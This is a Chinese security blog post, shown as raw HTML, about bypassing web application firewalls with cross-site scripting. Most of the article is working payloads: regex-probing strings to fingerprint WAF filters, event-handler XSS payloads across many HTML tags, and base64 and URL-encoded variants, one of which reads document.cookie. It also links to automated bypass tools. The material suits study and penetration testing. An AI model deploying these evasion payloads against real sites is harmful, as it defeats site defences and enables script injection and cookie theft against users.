<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="1.XSS绕WAF的各种方式: WAF探测 标签语法替换 空格绕过 请求方式差异规则松懈绕过 异常&#x2F;多种Method方法绕过 超大数据包绕过 字母大小写转换 双关键字绕过  2.自动化工具3.涉及资源 1.XSS绕WAF的各种方式:1.WAF探测:12345678910111213141、&lt;svg – 如果通过，表明没有进行任何标签检测;2、&lt;dev – 如果无法通过，则">
<meta property="og:type" content="article">
<meta property="og:title" content="[WAF绕过]XSS篇">
<meta property="og:url" content="https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/index.html">
<meta property="og:site_name" content="TonyD0g">
<meta property="og:description" content="1.XSS绕WAF的各种方式: WAF探测 标签语法替换 空格绕过 请求方式差异规则松懈绕过 异常&#x2F;多种Method方法绕过 超大数据包绕过 字母大小写转换 双关键字绕过  2.自动化工具3.涉及资源 1.XSS绕WAF的各种方式:1.WAF探测:12345678910111213141、&lt;svg – 如果通过，表明没有进行任何标签检测;2、&lt;dev – 如果无法通过，则">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-01-17T07:19:31.000Z">
<meta property="article:modified_time" content="2023-07-20T07:36:16.359Z">
<meta property="article:author" content="TonyD0g">
<meta property="article:tag" content="WAF绕过">
<meta name="twitter:card" content="summary">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>[WAF绕过]XSS篇</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/friends/">friends</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/TonyD0g">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2022/02/23/%E8%84%9A%E6%9C%AC%E5%B0%8F%E5%AD%90%E5%B8%B8%E7%94%A8%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8%E6%95%99%E7%A8%8B/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2022/01/07/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98%E6%B5%85%E8%B0%88%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&text=[WAF绕过]XSS篇" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&title=[WAF绕过]XSS篇" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&is_video=false&description=[WAF绕过]XSS篇" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=[WAF绕过]XSS篇&body=Check out this article: https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&title=[WAF绕过]XSS篇" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&title=[WAF绕过]XSS篇" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&title=[WAF绕过]XSS篇" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&title=[WAF绕过]XSS篇" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&name=[WAF绕过]XSS篇&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&t=[WAF绕过]XSS篇" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-XSS绕WAF的各种方式"><span class="toc-number">1.</span> <span class="toc-text">1.XSS绕WAF的各种方式:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-自动化工具"><span class="toc-number">2.</span> <span class="toc-text">2.自动化工具</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-涉及资源"><span class="toc-number">3.</span> <span class="toc-text">3.涉及资源</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-XSS绕WAF的各种方式-1"><span class="toc-number">4.</span> <span class="toc-text">1.XSS绕WAF的各种方式:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-WAF探测"><span class="toc-number">5.</span> <span class="toc-text">1.WAF探测:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-标签语法替换"><span class="toc-number">6.</span> <span class="toc-text">2.标签语法替换:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-空格绕过"><span class="toc-number">7.</span> <span class="toc-text">3. 空格绕过:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-请求方式差异规则松懈绕过"><span class="toc-number">8.</span> <span class="toc-text">4. 请求方式差异规则松懈绕过:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-异常-多种Method方法绕过"><span class="toc-number">9.</span> <span class="toc-text">5. 异常&#x2F;多种Method方法绕过:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-超大数据包绕过"><span class="toc-number">10.</span> <span class="toc-text">6. 超大数据包绕过:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7-字母大小写转换"><span class="toc-number">11.</span> <span class="toc-text">7. 字母大小写转换:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#8-双关键字绕过"><span class="toc-number">12.</span> <span class="toc-text">8. 双关键字绕过:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-自动化工具-1"><span class="toc-number">13.</span> <span class="toc-text">2.自动化工具:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-涉及资源-1"><span class="toc-number">14.</span> <span class="toc-text">3.涉及资源:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#学习来源"><span class="toc-number">15.</span> <span class="toc-text">学习来源:</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        [WAF绕过]XSS篇
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">TonyD0g</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-01-17T07:19:31.000Z" itemprop="datePublished">2022-01-17</time>
        
        (Updated: <time datetime="2023-07-20T07:36:16.359Z" itemprop="dateModified">2023-07-20</time>)
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/WAF%E7%BB%95%E8%BF%87/" rel="tag">WAF绕过</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <span id="more"></span>

<h2 id="1-XSS绕WAF的各种方式"><a href="#1-XSS绕WAF的各种方式" class="headerlink" title="1.XSS绕WAF的各种方式:"></a>1.XSS绕WAF的各种方式:</h2><ol>
<li><strong>WAF探测</strong></li>
<li><strong>标签语法替换</strong></li>
<li><strong>空格绕过</strong></li>
<li><strong>请求方式差异规则松懈绕过</strong></li>
<li><strong>异常&#x2F;多种Method方法绕过</strong></li>
<li><strong>超大数据包绕过</strong></li>
<li>字母大小写转换</li>
<li>双关键字绕过</li>
</ol>
<h2 id="2-自动化工具"><a href="#2-自动化工具" class="headerlink" title="2.自动化工具"></a>2.自动化工具</h2><h2 id="3-涉及资源"><a href="#3-涉及资源" class="headerlink" title="3.涉及资源"></a>3.涉及资源</h2><p><br></br></p>
<h2 id="1-XSS绕WAF的各种方式-1"><a href="#1-XSS绕WAF的各种方式-1" class="headerlink" title="1.XSS绕WAF的各种方式:"></a>1.XSS绕WAF的各种方式:</h2><h2 id="1-WAF探测"><a href="#1-WAF探测" class="headerlink" title="1.WAF探测:"></a>1.<strong>WAF探测</strong>:</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">1、&lt;svg – 如果通过，表明没有进行任何标签检测;</span><br><span class="line"></span><br><span class="line">2、&lt;dev – 如果无法通过，则为&lt;[a-z]+;</span><br><span class="line"></span><br><span class="line">3、x&lt;dev – 如果通过，则为^&lt;[a-z]+;</span><br><span class="line"></span><br><span class="line">4、&lt;dEv - 如果无法通过，则为&lt;[a-zA-Z]+;</span><br><span class="line"></span><br><span class="line">5、&lt;d3V - 如果无法通过，则为&lt;[a-zA-Z0-9]+;</span><br><span class="line"></span><br><span class="line">6、&lt;d|3v - 如果无法通过，则为&lt;.+;</span><br><span class="line"></span><br><span class="line">如果上述方式均无法探测成功，则说明目标站点部署的安全机制无法被绕过。这种方式的假阳性率非常高，因此不鼓励使用。</span><br><span class="line">如果上述探测方式有一个可行，那么可用来构造Payload的机制就非常多了.</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">进一步猜测用于匹配标签和事件处理器间数据过滤器的正则表达式:</span><br><span class="line">1、&lt;tag xxx - 如果无法通过，则为&#123;space&#125;;</span><br><span class="line"></span><br><span class="line">2、&lt;tag%09xxx - 如果无法通过，则为[\s];</span><br><span class="line"></span><br><span class="line">3、&lt;tag%09%09xxx - 如果无法通过，则为\s+;</span><br><span class="line"></span><br><span class="line">4、&lt;tag/xxx - 如果无法通过，则为[\s/]+;</span><br><span class="line"></span><br><span class="line">5、&lt;tag%0axxx- 如果无法通过，则为[\s\n]+;</span><br><span class="line"></span><br><span class="line">6、&lt;tag%0dxxx&gt;- 如果无法通过，则为[\s\n\r+]+;</span><br><span class="line"></span><br><span class="line">7、&lt;tag/~/xxx - 如果无法通过，则为.*+;</span><br></pre></td></tr></table></figure>

<h2 id="2-标签语法替换"><a href="#2-标签语法替换" class="headerlink" title="2.标签语法替换:"></a>2.<strong>标签语法替换</strong>:</h2><p>常见的WAF过滤的标签:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;  &lt;a&gt;  &lt;p&gt;  &lt;img&gt;  &lt;body&gt; &lt;button&gt;  &lt;var&gt;  &lt;div&gt;  &lt;iframe&gt;  &lt;object&gt; &lt;input&gt; </span><br><span class="line">&lt;textarea&gt;  &lt;keygen&gt; &lt;frameset&gt;  &lt;embed&gt;  &lt;svg&gt;  &lt;math&gt;  &lt;video&gt;  &lt;audio&gt; &lt;select&gt;</span><br></pre></td></tr></table></figure>

<p>audio:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;audio src=x onerror=alert(47)&gt;</span><br><span class="line">&lt;audio src=x onerror=prompt(1);&gt;</span><br><span class="line">&lt;audio src=1 href=1 onerror=&quot;javascript:alert(1)&quot;&gt;&lt;/audio&gt;</span><br></pre></td></tr></table></figure>

<p>video:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;video src=x onerror=prompt(1);&gt;</span><br><span class="line">&lt;video src=x onerror=alert(48)&gt;</span><br></pre></td></tr></table></figure>

<p>div:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;div style=&quot;width:expression(alert(/1/))&quot;&gt;1&lt;/div&gt;     ie浏览器执行</span><br><span class="line">&lt;div onmouseover%3d&#x27;alert%26lpar%3b1%26rpar%3b&#x27;&gt;DIV&lt;%2fdiv&gt;   url编码绕过</span><br></pre></td></tr></table></figure>

<p>math:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;math&gt;&lt;a/xlink:href=javascript:prompt(1)&gt;Xss</span><br><span class="line"></span><br><span class="line">&lt;math href=&quot;javascript:javascript:alert(1)&quot;&gt;Xss&lt;/math&gt;</span><br></pre></td></tr></table></figure>

<p>button:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;button onfocus=alert(1) autofocus&gt;</span><br><span class="line">&lt;button/onclick=alert(1) &gt;xss&lt;/button&gt;</span><br></pre></td></tr></table></figure>

<p>keygen:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;keygen/onfocus=prompt(1);&gt;</span><br><span class="line">&lt;keygen onfocus=javascript:alert(1) autofocus&gt;</span><br></pre></td></tr></table></figure>

<p>object:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;object data=&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==&quot;&gt;&lt;/object&gt;</span><br><span class="line"></span><br><span class="line">base64加密：PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg    </span><br><span class="line">      解码：&lt;script&gt;alert(1)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>ifame:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;IFRAME width%3d&quot;420&quot; height%3d&quot;315&quot; frameborder%3d&quot;0&quot; onload%3d&quot;alert(document.cookie)&quot;&gt;&lt;%2fIFRAME&gt;</span><br><span class="line">&lt;iframe%2fsrc%3d&quot;data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d&quot;&gt;</span><br><span class="line">&lt;iframe srcdoc%3d&#x27;%26lt%3bbody onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b&#x27;&gt;</span><br></pre></td></tr></table></figure>

<h2 id="3-空格绕过"><a href="#3-空格绕过" class="headerlink" title="3. 空格绕过:"></a>3. <strong>空格绕过</strong>:</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/**/ , %09</span><br></pre></td></tr></table></figure>

<h2 id="4-请求方式差异规则松懈绕过"><a href="#4-请求方式差异规则松懈绕过" class="headerlink" title="4. 请求方式差异规则松懈绕过:"></a>4. <strong>请求方式差异规则松懈绕过</strong>:</h2><p>详见[WAF绕过]SQL注入篇: <strong>3. 请求方式差异规则松懈绕过</strong></p>
<h2 id="5-异常-多种Method方法绕过"><a href="#5-异常-多种Method方法绕过" class="headerlink" title="5. 异常&#x2F;多种Method方法绕过:"></a>5. <strong>异常&#x2F;多种Method方法绕过</strong>:</h2><p>详见[WAF绕过]SQL注入篇: <strong>4. 异常&#x2F;多种Method方法绕过</strong></p>
<h2 id="6-超大数据包绕过"><a href="#6-超大数据包绕过" class="headerlink" title="6. 超大数据包绕过:"></a>6. <strong>超大数据包绕过</strong>:</h2><p>详见[WAF绕过]SQL注入篇: <strong>5. 超大数据包绕过</strong></p>
<h2 id="7-字母大小写转换"><a href="#7-字母大小写转换" class="headerlink" title="7. 字母大小写转换:"></a>7. 字母大小写转换:</h2><p>详见[WAF绕过]SQL注入篇: <strong>16. 字母大小写转换</strong></p>
<h2 id="8-双关键字绕过"><a href="#8-双关键字绕过" class="headerlink" title="8. 双关键字绕过:"></a>8. 双关键字绕过:</h2><p>详见[WAF绕过]SQL注入篇: <strong>17. 双关键字绕过</strong></p>
<h2 id="2-自动化工具-1"><a href="#2-自动化工具-1" class="headerlink" title="2.自动化工具:"></a>2.自动化工具:</h2><p>1.XSStrike</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/s0md3v/XSStrike</span><br></pre></td></tr></table></figure>

<h2 id="3-涉及资源-1"><a href="#3-涉及资源-1" class="headerlink" title="3.涉及资源:"></a>3.<strong>涉及资源</strong>:</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/do0dl3/xss-labs</span><br><span class="line"></span><br><span class="line">https://gitee.com/yhtmxl/imxss/</span><br><span class="line"></span><br><span class="line">https://github.com/3xp10it/xwaf</span><br><span class="line"></span><br><span class="line">https://xssfuzzer.com/fuzzer.html</span><br><span class="line"></span><br><span class="line">https://github.com/s0md3v/XSStrike</span><br><span class="line"></span><br><span class="line">https://bbs.pediy.com/thread-250852.htm</span><br><span class="line"></span><br><span class="line">https://github.com/TheKingOfDuck/fuzzDicts</span><br></pre></td></tr></table></figure>

<h2 id="学习来源"><a href="#学习来源" class="headerlink" title="学习来源:"></a>学习来源:</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">第二十八天waf绕过:</span><br><span class="line">https://www.yuque.com/weiker/xiaodi/nqcvum</span><br><span class="line"></span><br><span class="line">看我如何绕过WAF的XSS检测机制:</span><br><span class="line">https://www.freebuf.com/articles/web/200180.html</span><br></pre></td></tr></table></figure>


  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/friends/">friends</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/TonyD0g">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-XSS绕WAF的各种方式"><span class="toc-number">1.</span> <span class="toc-text">1.XSS绕WAF的各种方式:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-自动化工具"><span class="toc-number">2.</span> <span class="toc-text">2.自动化工具</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-涉及资源"><span class="toc-number">3.</span> <span class="toc-text">3.涉及资源</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-XSS绕WAF的各种方式-1"><span class="toc-number">4.</span> <span class="toc-text">1.XSS绕WAF的各种方式:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-WAF探测"><span class="toc-number">5.</span> <span class="toc-text">1.WAF探测:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-标签语法替换"><span class="toc-number">6.</span> <span class="toc-text">2.标签语法替换:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-空格绕过"><span class="toc-number">7.</span> <span class="toc-text">3. 空格绕过:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-请求方式差异规则松懈绕过"><span class="toc-number">8.</span> <span class="toc-text">4. 请求方式差异规则松懈绕过:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-异常-多种Method方法绕过"><span class="toc-number">9.</span> <span class="toc-text">5. 异常&#x2F;多种Method方法绕过:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-超大数据包绕过"><span class="toc-number">10.</span> <span class="toc-text">6. 超大数据包绕过:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7-字母大小写转换"><span class="toc-number">11.</span> <span class="toc-text">7. 字母大小写转换:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#8-双关键字绕过"><span class="toc-number">12.</span> <span class="toc-text">8. 双关键字绕过:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-自动化工具-1"><span class="toc-number">13.</span> <span class="toc-text">2.自动化工具:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-涉及资源-1"><span class="toc-number">14.</span> <span class="toc-text">3.涉及资源:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#学习来源"><span class="toc-number">15.</span> <span class="toc-text">学习来源:</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&text=[WAF绕过]XSS篇" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&title=[WAF绕过]XSS篇" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&is_video=false&description=[WAF绕过]XSS篇" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=[WAF绕过]XSS篇&body=Check out this article: https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&title=[WAF绕过]XSS篇" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&title=[WAF绕过]XSS篇" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&title=[WAF绕过]XSS篇" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&title=[WAF绕过]XSS篇" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&name=[WAF绕过]XSS篇&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/&t=[WAF绕过]XSS篇" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2023
    TonyD0g
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/friends/">friends</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/TonyD0g">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

